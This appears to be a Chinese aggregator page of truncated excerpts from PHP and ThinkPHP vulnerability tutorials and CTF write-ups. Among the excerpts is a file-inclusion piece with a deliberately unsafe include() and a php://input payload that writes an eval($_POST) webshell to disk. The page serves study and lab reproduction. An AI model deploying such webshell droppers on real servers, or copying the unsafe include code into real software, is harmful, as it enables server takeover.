【bugku-flag在index里(本地文件包含漏洞+php伪协议的结合应用)】教程文章相关的互联网学习教程文章

ThinkPHP漏洞分析与利用【代码】【图】

一、组件介绍 1.1 基本信息 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。 1.2 版本介绍 ThinkPHP发展至今,核心版本主要有以下几个系列,Think...

PHP反序列化漏洞【代码】【图】

1.什么是序列化和反序列化? PHP的序列化就是将各种类型的数据对象转换成一定的格式存储,其目的是为了将一个对象通过可保存的字节方式存储起来这样就可以将学列化字节存储到数据库或者文本当中,当需要的时候再通过反序列化获取。serialize() //实现变量的序列化,返回结果为字符串 unserialize() //实现字符串的反序列化,返回结果为变量下面我们看一个简单的序列化例子:<?php class SerializeTest{private $flag = "nu...

[md5 collision碰撞]即PHP对0e的缺陷漏洞

<?php $md51 = md5(QNKCDZO); $a = @$_GET[a]; $md52 = @md5($a); if(isset($a)){ if ($a != QNKCDZO && $md51 == $md52) {echo "flag{*****************}"; } else {echo "false!!!"; }} else{echo "please input a";} ?> PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,...

ThinkPHP5.x 任意代码执行漏洞复现【代码】【图】

0x00 概述 这个漏洞是Thinkphp官方在2018年底发布的一个安全更新中修复的一个重大漏洞,是由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。 0x01 影响版本 5.x < 5.1.315.x < 5.0.23 0x02 环境搭建 使用vulhub环境进行搭建 git clone https://github.com/vulhub/vulhub.git cd vulhub/thinkphp/5-rce/ docker-compose up -d搭建完成后访问http://ip:...

dedecms织梦uploadsafe.inc.php上传漏洞解决方法【图】

漏洞描述: dedecms过滤逻辑不严导致上传漏洞。 下面告诉大家解决的办法: 我们找到并打开/include/uploadsafe.inc.php文件,在里面找到如下代码: if(empty(${$_key._size})) { ${$_key._size} = @filesize($$_key); } 在其下面添加如下代码: $imtypes = array("image/pjpeg", "image/jpeg", "image/gif", "image/png", "image/xpng", "image/wbmp", "image/bmp"); ...

CVE-2018-19518 PHP imap_open函数任意命令执行漏洞复现【代码】【图】

CVE-2018-19518 PHP imap_open函数任意命令执行漏洞复现 环境 靶机:ubuntu18.04,腾讯云服务器,IP地址为49.235.204.174 docker中部署环境。 Firefox以及插件hackerbar 背景介绍 PHP的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前没有正确地过滤邮箱名称。 如果启用了rsh和ssh功能并且rsh命令是ssh命令的符...

配合php的伪协议利用文件包含漏洞【代码】【图】

一、php://input 将php代码写到post里进行提交 所用到的源码 <?php$file = $_REQUEST['p']; // 读取p参数传来的值include($file); // 包含 ?>配合写入一句话 <?php $f = fopen('./webshell.php','w'); // 打开文件 $str = "$_POST['x']"; fwrite($f,"<?php eval($str); ?>"); // 写入文件 fclose($f) // 关闭文件 ?>二、data http://192.168.0.100:88/include.php?p=data: text/plain,<?php ...

PHP反序列化漏洞【代码】

前几天安恒月赛两道web题中有一道题是关于php反序列化的,然后刚好前几天刚好看过这个知识点,于是乎这次比赛才没有爆零,总算是写出来了一道题/doge 序列化和反序列化 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 https://www.php.net/manual/zh/langu...

PHP反序列化漏洞总结(二)【代码】【图】

写在前边之前介绍了什么是序列化和反序列化,顺便演示了一个简单的反序列化漏洞,现在结合实战,开始填坑   前篇:https://www.cnblogs.com/Lee-404/p/12771032.html 1.POP链POP,面向属性编程(Property-Oriented Programing),之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数...

ThinkPHP5-文件包含漏洞【代码】【图】

漏洞概述 下面这段话来源: https://mochazz.github.io/2019/04/04/ThinkPHP5漏洞分析之文件包含7/#漏洞环境 本次漏洞存在于 ThinkPHP 模板引擎中,在加载模版解析变量时存在变量覆盖问题,而且程序没有对数据进行很好的过滤,最终导致 文件包含漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10。 环境 composer create-project topthink/think=5.0.18 tp5.0.18composer.json文件:"require": {"p...

ThinkPHP5.1.x代码执行漏洞【代码】【图】

前言 出题好几天没审计代码了,今天趁体育课来审一下ThinkPHP5.1.x代码执行漏洞。 一开始想做一个大总结来着,看了网上的文章已经有总结的很好的了,我就不再搬砖了。 这个文章仅仅是用来锻炼,哪怕是ThinkPHP5.1.x,他们因为版本的不同,debug是否开启导致payload也会不同。而且现在RCE基本不存在了,找找思路就行了。。 0x01 这里随便写写小总结,只是提一下。 先来明确一下 rce有两个大版本的分别 ThinkPHP 5.0-5.0.24 ThinkPHP...

phpcms9.6.0任意文件上传漏洞(CVE-2018-14399)【图】

0x00:前言 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。 可以直接前台getshell。 phpcms 9.6.0 0x01:漏洞测试 1.1 浏览器访问前台注册会员 1.2 点击注册按钮,用burp抓包 发送到Repeater模块 1.3 在另外一台机器上打开web功能(实验机器winxp 打开wampserver ,地址为...

thinkphp6 session 任意文件创建漏洞POC

ThinkPHP6.0.0-6.0.1。 thinkphp6 session 任意文件创建漏洞POC https://www.uedbox.com/post/65126/ https://www.php.cn/phpkj/thinkphp/441727.html

ThinkPHP5.0被攻击,发现漏洞

遇到问题:项目受到黑客攻击。 发现问题:第一时间查询日志,发现是ThinkPHP5框架的基础文件出现部分漏洞,黑客通过网站地址直接输入查询语句,获取网站数据,攻击公目录下的文件,将网站链接到第三方地址。 解决问题:先使用备份文件替换掉被攻击文件,而后通过ThinkPHP官方消息修改基础文件后,将路由地址修改成完全匹配。问题得到解决,网站没有继续被攻击。 思考问题:利用xdebug+PhpStorm进行调试,发现是因为thinkphp采用fil...

thinkphp5.0远程执行漏洞【图】

0x01 漏洞简介 由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell(可以控制服务器) 0x02 环境搭建 Phpstudy: php-5.5.38+Apache 下载存在漏洞版本我下载的版本是thinkphp_5.0.22搭建好以后如图 下载链接:http://www.thinkphp.cn/donate/download/id/1261.html 0x03 漏洞payload Phpinfo页面: http://127.0.0.1/thinkphp_5.0.22/public/index....

INDEX - 相关标签